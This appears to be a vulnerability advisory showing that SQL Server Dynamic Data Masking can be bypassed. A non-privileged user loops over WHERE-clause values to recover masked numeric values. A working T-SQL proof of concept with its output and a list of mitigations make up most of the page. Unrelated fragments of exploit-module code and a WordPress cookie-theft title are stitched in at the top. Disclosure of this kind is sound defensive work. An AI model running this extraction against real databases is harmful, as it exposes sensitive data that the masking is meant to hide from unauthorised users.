 register_dir_for_cleanup("../#{plugin_name}")    send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' })  endend

WordPress LiteSpeed Cache Cookie Theft

Microsoft SQL Server versions 2014, 2016, 2017, 2019, and 2022 suffer from an issue where masked data can be exposed through a brute force attack.

Title: SQL Server Masked Data Exposure Through Brute Force Attack  
Product:                   Database  
Manufacturer:              Microsoft  
Affected Version(s):       SQL Server 2014, 2016,2017,2019,2022  
Tested Version(s):         SQL Server 2014, 2016,2017,2019,2022  
Risk Level:                Low  
Security Feature:          Dynamic Data Masking  
Author of Advisory:        Emad Al-Mousa

*****************************************  
Vulnerability Details And Back Ground:

Microsoft SQL Server database system has a security feature called "dynamic data masking" , this feature is designed to redact/mask column level values (columns containing sensitive data ….for example credit card number…etc).

The feature is good but has many security weaknesses that organizations/companies should be aware of. Among them is brute force technique against the “where” conditional clause to retrieve actual data values (numeric values).

*****************************************  
Proof of Concept (PoC):

I will create database called demodb and create table called dbo.COMPANY and insert dummy data in it:

create database demodb;

USE [demodb]

GO

SET ANSI_NULLS ON

GO

SET QUOTED_IDENTIFIER ON

GO

CREATE TABLE [dbo].[COMPANY](

[COMPANY_NAME] [nvarchar](max) NULL,

[SALES] [int] NULL

) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

GO

USE [demodb]

GO

INSERT INTO [dbo].[COMPANY]

           ([COMPANY_NAME]

           ,[SALES])

     VALUES

           ('COMPANY_C','93')

GO

USE [demodb]

GO

INSERT INTO [dbo].[COMPANY]

           ([COMPANY_NAME]

           ,[SALES])

     VALUES

           ('COMPANY_A','11')

GO

USE [demodb]

GO

INSERT INTO [dbo].[COMPANY]

           ([COMPANY_NAME]

           ,[SALES])

     VALUES

           ('COMPANY_B','78')

GO

------  I will enable dynamic data masking function against SALES column:

 ALTER TABLE dbo.COMPANY

ALTER COLUMN SALES INT MASKED WITH (FUNCTION = 'default()');

------ Then, will create a user called reg_user that can only query the table, so the user will only see SALES column with complete masked data [ZERO values]:

USE [demodb]

GO

CREATE USER reg_user WITHOUT LOGIN;

GRANT SELECT ON dbo.COMPANY to reg_user;

EXECUTE AS USER = 'reg_user';

SELECT * FROM dbo.COMPANY;

REVERT;

------ However, using the same non-privileged database account reg_user …I will be able to extract Actual Values :

EXECUTE AS USER = 'reg_user';

 DECLARE @sales_txt nvarchar(max);

 DECLARE @LCounter INT= 1;

 WHILE (@LCounter < 99)

 BEGIN

SET @sales_txt=(SELECT COMPANY_NAME+' sales is ' +CAST (@LCounter as nvarchar)

   FROM dbo.COMPANY

   WHERE SALES=@LCounter)

   print @sales_txt

   SET @LCounter  = @LCounter  + 1

   END

REVERT;

Output:

COMPANY_A sales is 11

COMPANY_B sales is 78

COMPANY_C sales is 93

------ Actual values were successfully extracted from the masked column !

*****************************************

Protection Mechanisms:

1. Ensure network firewall rules are in-place to ensure database accounts can be connected to the destination database server host from specific list of source hosts. This will add good  
security protection layer especially if database account credentials were exposed.

2. Implement Security Auditing against identified sensitive tables.

3. Implement other security features along dynamic data masking such as encryption. of course Always Encrypted feature is the best in terms of data protection.

*****************************************  
References:  
https://learn.microsoft.com/en-us/sql/relational-databases/security/dynamic-data-masking?view=sql-server-ver16  
https://databasesecurityninja.wordpress.com/2023/08/08/hacking-sql-server-dynamic-data-masking-feature-with-brute-force-technique/  
https://www.youtube.com/watch?v=NiAg0sGsGtw

Tag

#wordpress